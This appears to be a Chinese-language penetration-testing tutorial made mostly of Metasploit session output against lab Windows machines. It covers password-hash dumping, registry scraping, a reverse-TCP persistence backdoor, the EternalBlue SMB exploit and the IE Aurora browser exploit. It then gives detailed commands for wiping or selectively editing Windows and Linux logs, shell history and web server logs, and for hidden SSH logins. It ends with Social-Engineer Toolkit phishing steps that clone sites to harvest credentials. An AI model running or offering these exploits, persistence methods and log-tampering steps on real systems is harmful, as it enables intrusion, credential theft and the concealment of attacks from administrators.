[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …

所以改用

代码语言:javascript复制
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[ ] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]        Obtaining the boot key...
[*]        Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*]        Obtaining the user list and keys...
[*]        Decrypting user keys...
[*]        Dumping password hints...
[*]        No users with password hints on this system
[*]        Dumping password hashes...
[ ]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ ]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ ]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ ]        xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ ]        tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

代码语言:javascript复制
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

获取目标机上流量

目标机必须支持:rpcapd service,在Windows上安装winpcap即可

代码语言:javascript复制
meterpreter > run post/windows/manage/rpcapd_start
[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002)
[ ] Rpcapd started successfully: C:Program Files (x86)winpcaprpcapd.exe -d -p 2002 -n

获取系统信息

Windows 10
代码语言:javascript复制
meterpreter >run scraper
[*] New session on 192.168.0.106:7216...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:UsersxiangAppDataLocalTempWLNUaYcc.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[-] Failed to run command reg.exe export HKLM C:UsersxiangAppDataLocalTempIymTDekJ.reg
[-] Error: Rex::TimeoutError Operation timed out.
[*]  Downloading HKLM (C:UsersxiangAppDataLocalTempIymTDekJ.reg)
[*] Exception: Rex::Post::
Windows 7
代码语言:javascript复制
meterpreter > run scraper
[*] New session on 192.168.0.158:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:WindowsTEMPsbOwIdlG.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:WindowsTEMPpQzbPtfD.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:WindowsTEMPxdgVency.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:WindowsTEMPaWoyKSRV.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:WindowsTEMPabgTRNGl.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.158:445...
Windows 2003
代码语言:javascript复制
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run scraper
[*] New session on 192.168.0.169:1438...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:DOCUME~1ADMINI~1LOCALS~1TempIatUIdPZ.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:DOCUME~1ADMINI~1LOCALS~1TempJcjKKLfF.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:DOCUME~1ADMINI~1LOCALS~1TempgLgAxVWq.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:DOCUME~1ADMINI~1LOCALS~1TempKDJAycay.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:DOCUME~1ADMINI~1LOCALS~1TempzebuwlsT.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.169:1438...

控制持久化

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106

启动meterpreter:-X

50秒后重连:-i 50

使用端口8888:-p 8888

目的IP 192.168.0.106:-r 192.168.0.106

代码语言:javascript复制
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888
[*] Persistent agent script is 99674 bytes long
[ ] Persistent Script written to C:WindowsTEMPQQxsjpmT.vbs
[*] Executing script C:WindowsTEMPQQxsjpmT.vbs
[ ] Agent executed with PID 2580
[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB
[ ] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB

Windows7成功

将命令行shell升级为Metewrpreter

代码语言:javascript复制
msf6> use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z

-z:攻击成功,在后台,不进入

代码语言:javascript复制
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[ ] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[ ] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[ ] 192.168.0.158:445 - Connection established for exploitation.
[ ] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[ ] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[ ] 192.168.0.158:445 - Sending SMBv2 buffers
[ ] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[ ] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48  0800
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3
[-] Unknown command: session
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.150:4433
msf6 exploit(windows/smb/ms17_010_eternalblue) >
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39  0800
[*] Stopping exploit/multi/handler
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4
[*] Starting interaction with 4...*/
meterpreter >


meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object


irb: warn: can't alias kill from irb_kill.
>> fs.dir.pwd
=> "C:\Windows\system32"

对IE浏览器激光漏洞进行渗透利用

Windows XP

代码语言:javascript复制
msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):


   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /
URIPATH => /
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:443
[*] Using URL: http://192.168.0.150/
[*] Server started.
msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

抹杀记录

当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!

我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。

最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

Windows

PowerShell修改时间命令

$(DATE) 表示当前日期和时间;

(Get-Date) 同(DATE),表示当前日期和时间;

$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间;

$(Get-Item abc.txt) 表示获取文件的句柄;

$(Get-Item abc.txt).creationtime 获取文件创建时间

$(Get-Item abc.txt).lastaccesstime 获取文件最后访问时间

$(Get-Item abc.txt).lastwritetime 获取文件修改时间

# 设置文件test.txt的时间为当前时间

(Get-Item abc.txt).creationtime=(DATE)

(Get-Item abc.txt).lastaccesstime=(DATE)

(Get-Item abc.txt).lastwritetime=(DATE)

# 设置文件abc.txt的时间为指定的某个时间

(Get-Item abc.txt).creationtime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastaccesstime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastwritetime=(Get-Date "11/04/2019 20:42:23")

其他记录

清理“运行”中的历史记录

  • 开始菜单中的“运行”菜单里保存着我们通过它运行过的程序及所打开的文件路径与名称。
  • 进入注册表编辑器,找到HKEY_CURRENT_ USERSortwareMicrosoftWindowsCurrentversionEsploierRunmru分支。从中选择不需要的或不想要别人看到的记录删除即可。

清理“查找”中的历史记录

  • (1)、清理查找计算机的历史记录
  • 进入注册表编辑器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5647分支,选择不需要的或是不想让别人看到的记录删除即可。
  • (2)清理查找文件的历史记录

进入注册表编辑器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5603分支,从中选择不需要的或是不想让别人看到的记录删除即可。

清理“我最近的文档”中的历史记录

  • 在任务栏上右单击,打开“任务栏和开始菜单属性”对话框。单击“开始菜单”“自定义”“高级”,单击“清理”按钮即可清理最近访问过的全部文档。如图2。
  • 如果只想删除自己的记录,可以进入资源管理器中的“C:Documentsnnd SettingsAdminnisyror(用户自己的帐号)Recent”文件夹,删去自己不想要别人看到的文档即可。

禁止显示上一次登录者的名称

进入注册表编辑器,找到HKEY_ LOCAL_ MACHINE Software Microsoft windowsNT Currentversion Winlogin 分支,新建一个“DontDisplayLastUserName”的字符串值,并设为“1”,重新启动后,就再不会显示上次登录的用户名了,当需要显示上次登录的用户名时设为“0”即可。

清理“回收站”

  • 在windows中简单地删除文件只是将文件转移到了“回收站”中,随时可以恢复查看。比较保险的做法是按住shift再点“删除”,或右击桌面上的“回收站”,选择“属性”,在“全局”选项卡中选择“所有驱动器均使用同一设置”,然后勾选下方的“删除时不将文件移回回收站,而是直接删除”,单击“确定”。

清理剪切板中的记录

  • 剪贴板里有时会隐藏着我们太多的秘密,如果不关机就直接离开,下一个上机的人只要按一下Ctrl V,刚才在剪贴板中的信息就被别人“盗取”了。无需研究如何清空剪贴板,只需用Ctrl C再随便复制一段无关的内容,原来的内容就会被覆盖。

清理TEMP文件夹中的记录

  • 许多应用程序通常会临时保存你的工作结果,离机前应删除被存放在C:(系统安装盘符)Documents and SettingsAdministrator(当前登录用户)Local SettingsTemp目录下的临时文件。

Linux

修改文件时间戳
代码语言:javascript复制
ls -l test.txt
# 修改文件的修改时间和访问时间
touch -d "2018-04-18 08:00:00" test.txt
touch -t 0101080000 test
清除history历史命令记录

#方法1

代码语言:javascript复制
history       # 查看历史操作命令(在Kali Linux下无效)
cat  ~/.bash_history       # history记录文件
vim ~/.bash_history
history –c

#方法2

使用vim打开一个文件

代码语言:javascript复制
vim test.txt
# 设置vim不记录命令,vim会将命令历史记录,保存在viminfo文件中。
:set history=0
:!command

#方法3

#通过修改配置文件/etc/profile,使系统不再保存命令记录。默认情况下历史命令将保存1000条,可以将该值改为0,然后保存并退出,最后重启系统使得配置文件生效。

代码语言:javascript复制
HISTSIZE=0

#方法4

#登录后执行下面命令,不记录历史命令(.bash_history)

代码语言:javascript复制
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

#方法5

仅在Kali Linux下

代码语言:javascript复制
rm -rf /root/.zsh_history
清除系统日志痕迹

/var/log/btmp 记录所有登录失败信息,使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看

/var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看

/var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看

/var/log/secure 记录与安全相关的日志信息

/var/log/message 记录系统启动后的信息和错误日志

echo > /var/log/btmp:#清除登录系统失败的记录,查看用lastb命令

echo > /var/log/wtmp:#清除登录系统成功的记录,查看用last命令

echo > /var/log/lastlog:清除用户最后一次登录时间,查看用lastlog命令

echo >/var/log/utmp:清除当前登录用户的信息,查看使用w,who,users等命令

cat /dev/null >/var/log/secure:清除安全日志记录

cat /dev/null >/var/log/message:清除系统日志记录

echo > /var/log/secure //登录信息

echo > /var/log/messages

echo>/var/log/syslog //记录系统日志的服务

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info

清除系统日志痕迹

#日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。

# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP

sed -i '/自己的ip/'d test.txt

sed -i '/192.168.1.2/'d test.txt

# 全局替换登录IP地址:

sed 's/要被取代的字串/新的字串/g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt

隐藏远程SSH登录记录

#隐身登录系统,不会被w、who、last等指令检测到。

ssh -T root@192.168.0.1 /bin/bash -i

#不记录ssh公钥在本地.ssh目录中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I

清除Web入侵痕迹

#直接替换日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

#常见日志地址

Apache

%APATCH_HOME%//logs/access.log # 访问日志

%APATCH_HOME%/logs/error.log # 错误日志

Nginx

%NHINX_HOME%/logs/access.log # 访问日志

%NHINX_HOME%/logs/error.log # 错误日志

Tomcat

%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # 请求日志

%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # 启动日志

%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # 本地日志

%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # manager管理日志

%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager专有日志

清除MySQL痕迹

代码语言:javascript复制
rm ~/.mysql_history
cat /dev/null > ~/.mysql_history

社会工程学

代码语言:javascript复制
git clone https://github.com/trustedsec/social-engineer-toolkit/
setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
gedit /etc/setoolkit/set.config

网络钓鱼攻击(Spear-Phishing Attack Vector)

利用文件格式漏洞(如PDF)等生成后门并通过email(GMAIL,SENDMAIL,)向目标发送带后门附件的电子邮件,诱使目标打开附件激活后门。

例子:

代码语言:javascript复制
#cd /usr/share/set
# ./setoolkit select from the menu
1) Social-Engineering Attacks
1) Perform a Mass Email Attack
3) Credential Harvester Attack Method
2) Site Cloner
…
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150
set:webattack> Enter the url to clone: www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

WEB 方式攻击

SET 可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。

Java Applet 方式

最成功的方式之一,并不是利用java 的漏洞,而是当目标浏览含后门的仿冒站点时会被询问是否允许执行web 中的java applet,一旦点击允许则payload 开始运行,目标将被重定向到真实的网站。

用户端(Client-side)web exploit 方式

利用用户端存在的软件漏洞,一般使用0day进行攻击的效果最好。

账号密码获取(Username and Password Harvesting)

通过克隆一个目标站并诱使攻击目标登陆,截获其账号密码。例如截获GMAIL 密码。

标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重定向到真实网站。

中间人攻击(Man-Left-in-the-Middle)

此方式使用已经被攻陷的网站的HTTP 请求或者网站的XSS 漏洞让用户的登陆信息发送至攻击者的HTTP 服务器。如果你发现了一个网站的XSS 漏洞,可以利用此漏洞构造一个URL发送给目标诱使其打开并登陆以截获登陆信息。

Web Jacking

当目标打开我们的网站时会有一个链接显示为正确的web 地址,此时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。

混合模式(multi-attack)

可同时使用以上多种攻击手段以提高成功率。

介质感染攻击(Infectious Media Generator)

可以让你生成一张光盘或者U盘,里面包含autorun.inf 来运行指定的后门文件或者file-format 漏洞文件。

迷你USB 人机接口设备(Teensy USB HID)

当电脑插入USB 设备且autorun.inf 被禁用时,可使用此方法将USB 设备模拟成一个键盘或鼠标设备,进而截获目标机器的击键记录。

SET 其他特殊功能

包括SET 交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP 隧道,当目标主机只开放HTTP 端口对外放行时可通过此功能与主机进行通信;WEB-GUI,包含了常用攻击和无线攻击向导,输入./set-web 即可运行。

0 人点赞